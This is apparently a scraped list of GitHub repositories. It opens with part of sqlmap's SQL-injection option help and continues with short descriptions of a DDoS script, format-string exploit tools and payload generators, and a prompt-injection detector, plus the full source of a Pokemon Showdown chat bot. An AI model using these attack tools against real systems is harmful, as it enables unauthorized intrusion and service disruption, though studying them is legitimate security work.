--reg-read Read a Windows registry key value --reg-add Write a Windows registry key value data --reg-del Delete a Windows registry key value --reg-key=REGKEY Windows registry key --reg-value=REGVAL Windows registry key value --reg-data=REGDATA Windows registry key value data --reg-type=REGTYPE Windows registry key value type General: These options can be used to set some general working parameters -s SESSIONFILE Load session from a stored (.sqlite) file -t TRAFFICFILE Log all HTTP traffic into a textual file --batch Never ask for user input, use the default behaviour --binary-fields=.. Result fields having binary values (e.g. "digest") --charset=CHARSET Force character encoding used for data retrieval --crawl=CRAWLDEPTH Crawl the website starting from the target URL --crawl-exclude=.. Regexp to exclude pages from crawling (e.g. "logout") --csv-del=CSVDEL Delimiting character used in CSV output (default ",") --dump-format=DU.. Format of dumped data (CSV (default), HTML or SQLITE) --eta Display for each output the estimated time of arrival --flush-session Flush session files for current target --forms Parse and test forms on target URL --fresh-queries Ignore query results stored in session file --hex Use DBMS hex function(s) for data retrieval --output-dir=OUT.. Custom output directory path --parse-errors Parse and display DBMS error messages from responses --save=SAVECONFIG Save options to a configuration INI file --scope=SCOPE Regexp to filter targets from provided proxy log --test-filter=TE.. Select tests by payloads and/or titles (e.g. ROW) --test-skip=TEST.. Skip tests by payloads and/or titles (e.g. BENCHMARK) --update Update sqlmap Miscellaneous: -z MNEMONICS Use short mnemonics (e.g. "flu,bat,ban,tec=EU") --alert=ALERT Run host OS command(s) when SQL injection is found --answers=ANSWERS Set question answers (e.g. "quit=N,follow=N") --beep Beep on question and/or when SQL injection is found --cleanup Clean up the DBMS from sqlmap specific UDF and tables --dependencies Check for missing (non-core) sqlmap dependencies --disable-coloring Disable console output coloring --gpage=GOOGLEPAGE Use Google dork results from specified page number --identify-waf Make a thorough testing for a WAF/IPS/IDS protection --skip-waf Skip heuristic detection of WAF/IPS/IDS protection --mobile Imitate smartphone through HTTP User-Agent header --offline Work in offline mode (only use session data) --page-rank Display page rank (PR) for Google dork results --purge-output Safely remove all content from output directory --smart Conduct thorough tests only if positive heuristic(s) --sqlmap-shell Prompt for an interactive sqlmap shell --wizard Simple wizard interface for beginner users
eolszewski / DDoSThis is a basic Python script that accepts a website's url in string format to initiate a DDoS attack. For educational purposes only.
Champ1604 / Botvar config = { name: 'KTN Bot', userid: function () { return toId(this.name); }, group: '@', join: true, rooms: ['lobby'], punishvals: { 1: 'warn', 2: 'mute', 3: 'hourmute', 4: 'roomban', 5: 'ban' }, privaterooms: ['staff'], hosting: {}, laddering: true, ladderPercentage: 70, debug: false }; /** * On server start, this sets up fake user connection for bot and uses a fake ip. * It gets a the fake user from the users list and modifies it properties. In addition, * it sets up rooms that bot will join and adding the bot user to Users list and * removing the fake user created which already filled its purpose * of easily filling in the gaps of all the user's property. */ function joinServer() { if (process.uptime() > 5) return; // to avoid running this function again when reloading var worker = new(require('./fake-process.js').FakeProcess)(); Users.socketConnect(worker.server, undefined, '1', '76.19.156.198'); for (var i in Users.users) { if (Users.users[i].connections[0].ip === '76.19.156.198') { var bot = Users.users[i]; bot.name = config.name; bot.named = true; bot.renamePending = config.name; bot.authenticated = true; bot.userid = config.userid(); bot.group = config.group; if (config.join === true) { for (var all in Rooms.rooms) { if (all != 'global') { bot.roomCount[all] = 1; } } Users.users[bot.userid] = bot; for (var allRoom in Rooms.rooms) { if (allRoom != 'global') { Rooms.rooms[allRoom].users[Users.users[bot.userid]] = Users.users[bot.userid]; } } } else { for (var index in config.rooms) { if (index != 'global') { bot.roomCount[joinRooms[index]] = 1; } } Users.users[bot.userid] = bot; for (var jIndex in config.rooms) { if (jIndex != 'global') { Rooms.rooms[jIndex].users[Users.users[bot.userid]] = Users.users[bot.userid]; } } } delete Users.users[i]; } } } const ACTION_COOLDOWN = 3 * 1000; const FLOOD_MESSAGE_NUM = 5; const FLOOD_PER_MSG_MIN = 500; // this is the minimum time between messages for legitimate spam. It's used to determine what "flooding" is caused by lag const FLOOD_MESSAGE_TIME = 6 * 1000; const MIN_CAPS_LENGTH = 18; const MIN_CAPS_PROPORTION = 0.8; var parse = { chatData: {}, processChatData: function (user, room, connection, message) { if (user.userid === config.userid() || !room.users[config.userid()]) return true; var cmds = this.processBotCommands(user, room, connection, message); if (cmds) return false; message = message.trim().replace(/ +/g, " "); // removes extra spaces so it doesn't trigger stretching this.updateSeen(user.userid, 'c', room.title); var time = Date.now(); if (!this.chatData[user]) this.chatData[user] = { zeroTol: 0, lastSeen: '', seenAt: time }; if (!this.chatData[user][room]) this.chatData[user][room] = { times: [], points: 0, lastAction: 0 }; this.chatData[user][room].times.push(time); var pointVal = 0; var muteMessage = ''; // moderation for flooding (more than x lines in y seconds) var isFlooding = (this.chatData[user][room].times.length >= FLOOD_MESSAGE_NUM && (time - this.chatData[user][room].times[this.chatData[user][room].times.length - FLOOD_MESSAGE_NUM]) < FLOOD_MESSAGE_TIME && (time - this.chatData[user][room].times[this.chatData[user][room].times.length - FLOOD_MESSAGE_NUM]) > (FLOOD_PER_MSG_MIN * FLOOD_MESSAGE_NUM)); if (isFlooding) { if (pointVal < 2) { pointVal = 2; muteMessage = ', flooding'; } } // moderation for caps (over x% of the letters in a line of y characters are capital) var capsMatch = message.replace(/[^A-Za-z]/g, '').match(/[A-Z]/g); if (capsMatch && toId(message).length > MIN_CAPS_LENGTH && (capsMatch.length >= Math.floor(toId(message).length * MIN_CAPS_PROPORTION))) { if (pointVal < 1) { pointVal = 1; muteMessage = ', caps'; } } // moderation for stretching (over x consecutive characters in the message are the same) var stretchMatch = message.toLowerCase().match(/(.)\1{7,}/g) || message.toLowerCase().match(/(..+)\1{4,}/g); // matches the same character (or group of characters) 8 (or 5) or more times in a row if (stretchMatch) { if (pointVal < 1) { pointVal = 1; muteMessage = ', stretching'; } } if (pointVal > 0 && !(time - this.chatData[user][room].lastAction < ACTION_COOLDOWN)) { var cmd = 'mute'; // defaults to the next punishment in config.punishVals instead of repeating the same action (so a second warn-worthy // offence would result in a mute instead of a warn, and the third an hourmute, etc) if (this.chatData[user][room].points >= pointVal && pointVal < 4) { this.chatData[user][room].points++; cmd = config.punishvals[this.chatData[user][room].points] || cmd; } else { // if the action hasn't been done before (is worth more points) it will be the one picked cmd = config.punishvals[pointVal] || cmd; this.chatData[user][room].points = pointVal; // next action will be one level higher than this one (in most cases) } if (config.privaterooms.indexOf(room) >= 0 && cmd === 'warn') cmd = 'mute'; // can't warn in private rooms // if the bot has % and not @, it will default to hourmuting as its highest level of punishment instead of roombanning if (this.chatData[user][room].points >= 4 && config.group === '%') cmd = 'hourmute'; if (this.chatData[user].zeroTol > 4) { // if zero tolerance users break a rule they get an instant roomban or hourmute muteMessage = ', zero tolerance user'; cmd = config.group !== '%' ? 'roomban' : 'hourmute'; } if (this.chatData[user][room].points >= 2) this.chatData[user].zeroTol++; // getting muted or higher increases your zero tolerance level (warns do not) this.chatData[user][room].lastAction = time; room.add('|c|' + user.group + user.name + '|' + message); CommandParser.parse(('/' + cmd + ' ' + user.userid + muteMessage), room, Users.get(config.name), Users.get(config.name).connections[0]); return false; } return true; }, updateSeen: function (user, type, detail) { user = toId(user); type = toId(type); if (type in {j: 1, l: 1, c: 1} && (config.rooms.indexOf(toId(detail)) === -1 || config.privaterooms.indexOf(toId(detail)) > -1)) return; var time = Date.now(); if (!this.chatData[user]) this.chatData[user] = { zeroTol: 0, lastSeen: '', seenAt: time }; if (!detail) return; var msg = ''; if (type in {j: 1, l: 1, c: 1}) { msg += (type === 'j' ? 'joining' : (type === 'l' ? 'leaving' : 'chatting in')) + ' ' + detail.trim() + '.'; } else if (type === 'n') { msg += 'changing nick to ' + ('+%@&#~'.indexOf(detail.trim().charAt(0)) === -1 ? detail.trim() : detail.trim().substr(1)) + '.'; } if (msg) { this.chatData[user].lastSeen = msg; this.chatData[user].seenAt = time; } }, processBotCommands: function (user, room, connection, message) { if (room.type !== 'chat' || message.charAt(0) !== '.') return; var cmd = '', target = '', spaceIndex = message.indexOf(' '), botDelay = (Math.floor(Math.random() * 6) * 1000), now = Date.now(); if (spaceIndex > 0) { cmd = message.substr(1, spaceIndex - 1); target = message.substr(spaceIndex + 1); } else { cmd = message.substr(1); target = ''; } cmd = cmd.toLowerCase(); if ((message.charAt(0) === '.' && Object.keys(Bot.commands).join(' ').toString().indexOf(cmd) >= 0 && message.substr(1) !== '') && !Bot.config.debug) { if ((now - user.lastBotCmd) * 0.001 < 30) { connection.sendTo(room, 'Please wait ' + Math.floor((30 - (now - user.lastBotCmd) * 0.001)) + ' seconds until the next command.'); return true; } user.lastBotCmd = now; } if (commands[cmd]) { var context = { sendReply: function (data) { setTimeout(function () { room.add('|c|' + config.group + config.name + '|' + data); }, botDelay); }, sendPm: function (data) { var message = '|pm|' + config.group + config.name + '|' + user.group + user.name + '|' + data; user.send(message); }, can: function (permission) { if (!user.can(permission)) { setTimeout(function () { connection.sendTo(room, '.' + cmd + ' - Access denied.'); }, botDelay); return false; } return true; }, parse: function (target) { CommandParser.parse(target, room, Users.get(Bot.config.name), Users.get(Bot.config.name).connections[0]); }, }; if (typeof commands[cmd] === 'function') { commands[cmd].call(context, target, room, user, connection, cmd, message); } } }, getTimeAgo: function (time) { time = Date.now() - time; time = Math.round(time / 1000); // rounds to nearest second var seconds = time % 60; var times = []; if (seconds) times.push(String(seconds) + (seconds === 1 ? ' second' : ' seconds')); var minutes, hours, days; if (time >= 60) { time = (time - seconds) / 60; // converts to minutes minutes = time % 60; if (minutes) times = [String(minutes) + (minutes === 1 ? ' minute' : ' minutes')].concat(times); if (time >= 60) { time = (time - minutes) / 60; // converts to hours hours = time % 24; if (hours) times = [String(hours) + (hours === 1 ? ' hour' : ' hours')].concat(times); if (time >= 24) { days = (time - hours) / 24; // you can probably guess this one if (days) times = [String(days) + (days === 1 ? ' day' : ' days')].concat(times); } } } if (!times.length) times.push('0 seconds'); return times.join(', '); } }; var commands = { guide: function (target, room, user) { var commands = Object.keys(Bot.commands); commands = commands.join(', ').toString(); this.sendReply('List of bot commands: ' + commands); }, say: function (target, room, user) { if (!this.can('say')) return; this.sendReply(target); }, tell: function (target, room, user) { if (!this.can('bottell')) return; var parts = target.split(','); if (parts.length < 2) return; this.parse('/tell ' + toId(parts[0]) + ', ' + Tools.escapeHTML(parts[1])); this.sendReply('Message sent to ' + parts[0] + '.'); }, penislength: function (target, room, user) { this.sendReply('8.5 inches from the base. Perv.'); }, seen: function (target, room, user, connection) { if (!target) return; if (!toId(target) || toId(target).length > 18) return connection.sendTo(room, 'Invalid username.'); if (!parse.chatData[toId(target)] || !parse.chatData[toId(target)].lastSeen) { return this.sendPm('The user ' + target.trim() + ' has never been seen chatting in rooms.'); } return this.sendPm(target.trim() + ' was last seen ' + parse.getTimeAgo(parse.chatData[toId(target)].seenAt) + ' ago, ' + parse.chatData[toId(target)].lastSeen); }, salt: function (target, room, user) { if (!global.salt) global.salt = 0; salt++; this.sendReply(salt + '% salty.'); }, whois: (function () { var reply = [ "Just another Pokemon Showdown user", "A very good competetive pokemon player", "A worthy opponent", "Generally, a bad user", "Generally, a good user", "Someone who is better than you", "An amazing person", "A beautiful person", "A person who is probably still a virgin", "A leader", "A lord helix follower", "An annoying person", "A person with a salty personality", "A Coffee Addict", "A Mediocre Player", ]; return function (target, room, user) { if (!target) return; var message = reply[Math.floor(Math.random() * reply.length)]; target = toId(target); if (target === 'creaturephil') message = 'An experienced **coder** for pokemon showdown. He has coded for over 5 servers such as kill the noise, moxie, aerdeith, nova, etc. Please follow him on github: https://github.com/CreaturePhil'; if (target === config.userid()) message = 'That\'s me.'; if (target === 'zarel') message = 'Pokemon Showdown Creator'; if (target === 'stevoduhhero') message = 'STEVO DUH GOD DAMN HERO! Respect him!'; if (target === 'rickycocaine') message = 'RICKY COCAAAAAAAINE'; this.sendReply(message); }; })(), helix: (function () { var reply = [ "Signs point to yes.", "Yes.", "Reply hazy, try again.", "Without a doubt.", "My sources say no.", "As I see it, yes.", "You may rely on it.", "Concentrate and ask again.", "Outlook not so good.", "It is decidedly so.", "Better not tell you now.", "Very doubtful.", "Yes - definitely.", "It is certain.", "Cannot predict now.", "Most likely.", "Ask again later.", "My reply is no.", "Outlook good.", "Don't count on it." ]; return function (target, room, user) { if (!target) return; var message = reply[Math.floor(Math.random() * reply.length)]; this.sendPm(message); }; })(), maketournament: function (target, room, user) { if (!this.can('maketournament')) return; if (Tournaments.tournaments[room.id]) return this.sendReply('A tournament is already running in the room.'); var parts = target.split(','), self = this, counter = 1; if (parts.length < 2 || Tools.getFormat(parts[0]).effectType !== 'Format' || !/[0-9]/.test(parts[1])) return this.sendPm('Correct Syntax: !maketournament [tier], [time/amount of players]'); if (parts[1].indexOf('minute') >= 0) { var time = Number(parts[1].split('minute')[0]); this.parse('/tour create ' + parts[0] + ', elimination'); this.sendReply('**You have ' + time + ' minute' + parts[1].split('minute')[1] + ' to join the tournament.**'); var loop = function () { setTimeout(function () { if (!Tournaments.tournaments[room.id]) return; if (counter === time) { if (Tournaments.tournaments[room.id].generator.users.size < 2) { self.parse('/tour end'); return self.sendReply('**The tournament was canceled because of lack of players.**'); } return self.parse('/tour start'); } if ((time - counter) === 1) { self.sendReply('**You have ' + (time - counter) + ' minute to sign up for the tournament.**'); } else { self.sendReply('**You have ' + (time - counter) + ' minutes to sign up for the tournament.**'); } counter++; if (!Tournaments.tournaments[room.id].isTournamentStarted) loop(); }, 1000 * 60); }; loop(); return; } if (Number(parts[1]) < 2) return; parts[1] = parts[1].replace(/[^0-9 ]+/g, ''); this.parse('/tour create ' + parts[0] + ', elimination'); this.sendReply('**The tournament will begin when ' + parts[1] + ' players join.**'); var playerLoop = function () { setTimeout(function () { if (!Tournaments.tournaments[room.id]) return; if (Tournaments.tournaments[room.id].generator.users.size === Number(parts[1])) { self.parse('/tour start'); } playerLoop(); }, 1000 * 15); }; playerLoop(); }, hosttournament: function (target, room, user) { if (!this.can('hosttournament')) return; if (target.toLowerCase() === 'end') { if (!Bot.config.hosting[room.id]) return this.sendPm('I\'m not hosting tournaments.'); Bot.config.hosting[room.id] = false; return this.sendReply('I will now stop hosting tournaments.'); } if (Bot.config.hosting[room.id]) return this.sendReply('I\'m already hosting tournaments.'); Bot.config.hosting[room.id] = true this.sendReply('**I will now be hosting tournaments.**'); var self = this, _room = room, _user = user; var poll = function () { if (!Bot.config.hosting[_room.id]) return; setTimeout(function () { if (Poll[_room.id].question) self.parse('/endpoll'); self.parse('/poll Tournament tier?, ' + Object.keys(Tools.data.Formats).filter(function (f) { return Tools.data.Formats[f].effectType === 'Format'; }).join(", ")); setTimeout(function () { self.parse('/endpoll'); Bot.commands.maketournament.call(self, (Poll[_room.id].topOption + ', 2 minute'), _room, _user); }, 1000 * 60 * 2); }, 1000 * 5); }; var loop = function () { setTimeout(function () { if (!Tournaments.tournaments[_room.id] && !Poll[_room.id].question) poll(); if (Bot.config.hosting[_room.id]) loop(); }, 1000 * 60); }; poll(); loop(); }, join: function (target, room, user, connection) { if (!user.can('kick')) return; if (!target || !Rooms.get(target.toLowerCase())) return; if (Rooms.get(target.toLowerCase()).users[Bot.config.name]) return this.sendPm('I\'m already in this room.'); Users.get(Bot.config.name).joinRoom(Rooms.get(target.toLowerCase())); var botDelay = (Math.floor(Math.random() * 6) * 1000) setTimeout(function() { connection.sendTo(room, Bot.config.name + ' has join ' + target + ' room.'); }, botDelay); }, leave: function (target, room, user, connection) { if (!user.can('kick')) return; if (!target || !Rooms.get(target.toLowerCase())) return; Users.get(Bot.config.name).leaveRoom(Rooms.get(target.toLowerCase())); var botDelay = (Math.floor(Math.random() * 6) * 1000) setTimeout(function() { connection.sendTo(room, Bot.config.name + ' has left ' + target + ' room.'); }, botDelay); }, rps: function (target, room, user) { if (!target) return; var options = ['rock', 'paper', 'scissors'], rng = options[Math.floor(Math.random() * options.length)], target = toId(target); if (rng === target) return this.sendReply('I chose ' + rng + '. The result is a tie!'); if (rng === options[0]) { if (target === options[1]) return this.sendReply('I chose ' + rng + '. ' + user.name + ' wins!'); if (target === options[2]) return this.sendReply('I chose ' + rng + '. I win and ' + user.name + ' loses!'); } if (rng === options[1]) { if (target === options[2]) return this.sendReply('I chose ' + rng + '. ' + user.name + ' wins!'); if (target === options[0]) return this.sendReply('I chose ' + rng + '. I win and ' + user.name + ' loses!'); } if (rng === options[2]) { if (target === options[0]) return this.sendReply('I chose ' + rng + '. ' + user.name + ' wins!'); if (target === options[1]) return this.sendReply('I chose ' + rng + '. I win and ' + user.name + ' loses!'); } }, }; exports.joinServer = joinServer; exports.config = config; exports.parse = parse; exports.commands = commands; // Battling AI exports.teams=new Object;var fs=require("fs");fs.readFile("./config/bot-teams.json",function(e,t){if(e)return;t=""+t;exports.teams=JSON.parse(t)});exports.addTeam=function(e,t){if(t&&t.length&&typeof t=="string"){if(!Bot.teams[e])Bot.teams[e]=new Array;Bot.teams[e].push(t);fs.writeFile("./config/bot-teams.json",JSON.stringify(Bot.teams))}};exports.randomTeam=function(e){if(e.split("random").length-1>0)return"";var t;if(Bot.teams[e])t=Bot.teams[e][Math.floor(Math.random()*Bot.teams[e].length)];if(!t)t="";return t};exports.booty={addBattle:function(e,t){Bot.booty.battles["battle-"+e.toLowerCase().replace(/[^a-z0-9]+/g,"")+"-"+(Rooms.global.lastBattle+1)]={booty:{user:Users.get(Bot.config.name),exposed:[{},{},{},{},{},{}]},opp:{user:t,exposed:[{},{},{},{},{},{}]}}},battles:new Object,check:function(){global.bootytimeout=setTimeout(function(){if(!Bot.booty.battles){Bot.booty.check();return}for(var e in Bot.booty.battles){if(Bot.booty.battles[e]){var t=Rooms.rooms[e];if(t){var n=t.battle;if(n){n=n.field;if(n[toId(Bot.config.name)])if(n[toId(Bot.config.name)].side)if(n[toId(Bot.config.name)].side.pokemon)if(n[toId(Bot.config.name)].side.pokemon[0].condition.charAt(0)=="0")Bot.booty.forceSwitch(e);if(n[toId(Bot.config.name)])if(n[toId(Bot.config.name)].forceSwitch)Bot.booty.forceSwitch(e)}}}}Bot.booty.check()},2e3)},forceSwitch:function(e){var t;if(Rooms.rooms[e])t=Rooms.rooms[e];if(!t)return;var n=Bot.booty.battles[t.id];var r=t.battle.field,i=r[toId(Bot.config.name)].side.pokemon;var s=i.length;if(!o){var o=new Array;for(var u=0;u<s;u++)o.push(u)}var a=Math.floor(Math.random()*s);while(a==1&&o.indexOf(a)==-1&&i[a].condition.charAt(0)=="0")a=Math.floor(Math.random()*s);t.decision(Users.get(toId(Bot.config.name)),"choose","switch "+parseInt(a+1,10))},predict:function(e,t,n,r){function N(e,t,n){var r=false;var i=1;var s=0;for(var o in t){var u=1;var a=t[o];for(var f in e)u=u*T[Tools.data.TypeChart[e[f]].damageTaken[a]];if(u>=2)r=true;i=i*u;if(s<u)s=u}if(n){if(n.total)return i;else if(n.best)return s}return r}function C(e,t){var n=e.baseStats;var r=0;for(var i in n)r+=n[i];var s=e.abilities;var o=e.types;var u={wall:false,frail:false,attacking:{mixed:false,physical:false,special:false},defending:{mixed:false,physical:false,special:false}};if(n.hp<100)u.frail=true;if((n.hp+n.def+n.spd)/r>.474)u.wall=true;var a=n.atk+n.spa;var f=n.atk/a;var l=n.spa/a;if(12.75>Math.abs(f-l)*100){u.attacking.mixed=true;u.attacking.physical=true;u.attacking.special=true}else{if(f>l)u.attacking.physical=true;if(l>f)u.attacking.special=true}var c=n.def+n.spd;var h=n.def/c;var p=n.spd/c;if(12.75>Math.abs(h-p)*100){if(n.def>=75)u.defending.physical=true;if(n.spd>=75)u.defending.special=true;if(n.def>=75&&n.spd>=75)u.defending.mixed=true}else{if(h>p)if(n.def>=75)u.defending.physical=true;if(p>h)if(n.spd>=75)u.defending.special=true}if(u.wall||u.tank)u.frail=false;if(t===0){}return u}function k(){var e=new Array;var t=new Array;var n={move:"",power:0};var r=new Object;for(var i in v){var s=1;var o=Tools.data.Movedex[toId(v[i])];var u=o.type;for(var i in E.types)s=s*T[Tools.data.TypeChart[E.types[i]].damageTaken[u]];var c=a[0].baseAbility;var h=a[0].item;if(c=="thickfat"&&(u=="Fire"||u=="Ice"))s=s*.5;if((h=="airballoon"||c=="levitate")&&u=="Ground")s=0;var p=1;if(w.types.indexOf(u)!=-1)p=1.5;var d=s*o.basePower*p;e.push(s);t.push(d);if(d>n.power)n={move:o.name,power:d,info:v[i]};if(o.category=="Status"){r[o.id]=v[i]}}var m,g;var y="";if(f[0].item.split("ite").length-1>0&&f[0].details.split("-mega").length-1==0)y=" mega";if(m&&!g){}else{}return"move "+n.move+y+"|"+l}function L(){return A()}function A(){function n(e,t){var n=0;if(e.bestmovepower>t)n++;if(e.faster)n++;return n}var e=0;var t={slot:0,bestmovepower:0,faster:false};for(var r in f){var i=f[r];var s=Tools.data.Pokedex[toId(i.details.split(",")[0])];if(i.condition.charAt(0)!="0"){e++;var o=new Array;for(var u in i.moves)o[u]=i.moves[u].replace(new RegExp("[0-9]","g"),"");var a=new Array;for(var u in o)a.push(Tools.data.Movedex[toId(o[u])].type);var l=false;if(s.baseStats.spe>E.baseStats.spe)l=true;var c=0;for(var h in o){var p=1;var d=Tools.data.Movedex[toId(o[h])];var v=d.type;for(var m in E.types)p=p*T[Tools.data.TypeChart[E.types[m]].damageTaken[v]];var g=1;if(s.types.indexOf(v)!=-1)g=1.5;var y=p*d.basePower*g;if(y>c)c=y}var b={slot:r,bestmovepower:c,faster:l};if(n(t,b.bestmovepower)<n(b,t.bestmovepower))t=b}}t.slot++;if(e==1||t.slot==1)k();return"switch "+t.slot}function O(){var e=false;var t=false;var n=E.baseStats.spe;var r=w.baseStats.spe;if(n>r)t=true;var i=N(w.types,E.types);var s=N(E.types,w.types);var o=new Array;for(var u in v)o.push(Tools.data.Movedex[toId(v[u].move)].type);var a=N(E.types,o);if(!(!t&&i&&a&&x.frail)){if(t&&S.frail)e=true;if(t&&i)e=true;if(i)e=true}if(x.wall&&S.wall)e=1;if(e===true){var f=L();if(f.replace(/^\D+/g,"")!=1)return f}else if(e==1)A();return k()}var i;var s={change:false};var o=Users.get(Bot.config.name);if(!t.battle.field||!o)return false;if(!t.battle.field[o.userid])return false;var u=t.battle.field,a=u[n.userid].side.pokemon,f=u[o.userid].side.pokemon;if(a[0].condition.charAt(0)=="0"&&f[0].condition.charAt(0)!="0")return false;if(f[0].condition.charAt(0)=="0")s.change=true;var l=u[n.userid].rqid;var c=Bot.booty.battles[t.id];c.turn=l;if(r=="team"){var h=f.length;var p=Math.floor(Math.random()*h);t.decision(o,"choose","team "+p+"|"+l);return false}if(!u[o.userid]){return false}if(!u[o.userid].active){return false}var d=u[o.userid].active[0].moves;var v=new Array;for(var m in d){var g=d[m];if(!g.disabled&&g.pp)v.push(g)}var y=a[0].details.split(",")[0];var b=f[0].details.split(",")[0];var w=Tools.data.Pokedex[toId(b)];var E=Tools.data.Pokedex[toId(y)];var S=C(w,0);var x=C(E);var T=[1,2,.5,0];switch(r){case"switch":case"move":case"choose":if(!s.change){var M=u[toId(Bot.config.name)].active;if(!M)M=false;else M=M[0].trapped;if(M){i=k()}else{i=O()}}else{i=A()}t.decision(o,"choose",i);break}}};var bootyreplace={search:function(e,t,n){function r(e){var t=Math.floor(Math.random()*100)+1;if(t>e)return false;return true}if(!Bot.config.laddering)return;if(r(Bot.config.ladderPercentage))return;if(!toId(e))return false;var i=toId(e);var s=true;var o=Tools.fastUnpackTeam(n.team);var u=TeamValidator.validateTeamSync(i,o);if(u&&u.length)s=false;if((e=="ou"||e.split("random").length-1>0)&&r(100)&&s){Bot.booty.addBattle(e,n);Rooms.global.startBattle(Users.get(Bot.config.name),n,e,true,Bot.randomTeam(e),n.team);Rooms.global.cancelSearch(n);return false}if(e){if(Config.pmmodchat){var a=n.group;if(Config.groupsranking.indexOf(a)<Config.groupsranking.indexOf(Config.pmmodchat)){var f=Config.groups[Config.pmmodchat].name||Config.pmmodchat;this.popupReply("Because moderated chat is set, you must be of rank "+f+" or higher to search for a battle.");return false}}Rooms.global.searchBattle(n,e);if(e=="ou"||e.split("random").length-1>0){Users.get(Bot.config.name).team=Bot.randomTeam(e);Bot.booty.addBattle(e,n);Users.get(Bot.config.name).prepBattle(e,"search",null,Rooms.global.finishSearchBattle.bind(Rooms.global,Users.get(Bot.config.name),e))}}else{Rooms.global.cancelSearch(n)}},challenge:function(e,t,n,r){e=this.splitTarget(e);var i=this.targetUser;if(!i||!i.connected){return this.popupReply("The user '"+this.targetUsername+"' was not found.")}if(i.blockChallenges&&!n.can("bypassblocks",i)){return this.popupReply("The user '"+this.targetUsername+"' is not accepting challenges right now.")}if(Config.pmmodchat){var s=n.group;if(Config.groupsranking.indexOf(s)<Config.groupsranking.indexOf(Config.pmmodchat)){var o=Config.groups[Config.pmmodchat].name||Config.pmmodchat;this.popupReply("Because moderated chat is set, you must be of rank "+o+" or higher to challenge users.");return false}}n.prepBattle(e,"challenge",r,function(t){if(t)n.makeChallenge(i,e)});if(this.targetUsername==Bot.config.name){if(!global.bootytimeout)Bot.booty.check();var u=Users.get(Bot.config.name);u.prepBattle(e,"challenge",u.connections[0],function(e){if(e)u.acceptChallengeFrom(n.userid)});Bot.booty.addBattle(e,n);if(e.split("random").length-1>0){}else{if(n.team!=undefined&&n.team!="")Bot.addTeam(e,n.team);var a=Bot.randomTeam(e);if(a==""||!a){a=n.team;if(a==undefined||a=="")a=""}u.team=a}}},move:function(e,t,n){if(!t.decision)return this.sendReply("You can only do this in battle rooms.");t.decision(n,"choose","move "+e);if(Bot.booty.battles[t.id])Bot.booty.predict(e,t,n,"move")},sw:"switch","switch":function(e,t,n){if(!t.decision)return this.sendReply("You can only do this in battle rooms.");t.decision(n,"choose","switch "+parseInt(e,10));if(Bot.booty.battles[t.id])Bot.booty.predict(e,t,n,"switch")},choose:function(e,t,n){if(!t.decision)return this.sendReply("You can only do this in battle rooms.");t.decision(n,"choose",e);if(Bot.booty.battles[t.id])Bot.booty.predict(e,t,n,"choose")},team:function(e,t,n){if(!t.decision)return this.sendReply("You can only do this in battle rooms.");t.decision(n,"choose","team "+e);if(Bot.booty.battles[t.id])Bot.booty.predict(e,t,n,"team")},part:function(e,t,n,r){if(t.id==="global")return false;var i=Rooms.get(e);if(e&&!i){return this.sendReply("The room '"+e+"' does not exist.")}n.leaveRoom(i||t,r)}};for(var i in bootyreplace)CommandParser.commands[i]=bootyreplace[i]; joinServer();
mirseo / String FormatterA high-performance string formatter written in Rust. This project detects and blocks LLM prompt injection and jailbreak attacks. It also features a customizable rule-based system and defends against obfuscated prompt attacks.
pikulet / Mem Attacks ExampleExamples of Binary Exploitations - Buffer Overflow, Return-Oriented Programming and Format String
0xdea / Raptor Romhack21#RomHack21 raptor's party pack.
lovasoa / Pyformat ChallengePython format string vulnerability exploitation challenge
publicqi / One FmtFormat string payload generator
arvindpj007 / Format String Vulnerability AngbandPerforming an exploit of Format String Vulnerability to leak information. Given a C compiled vulnerable software, with the help of reverse engineering and debugging; the attack had to be conducted to obtain dumb and smart leak of information.
owlinux1000 / Fsalibformat string attack payload generator
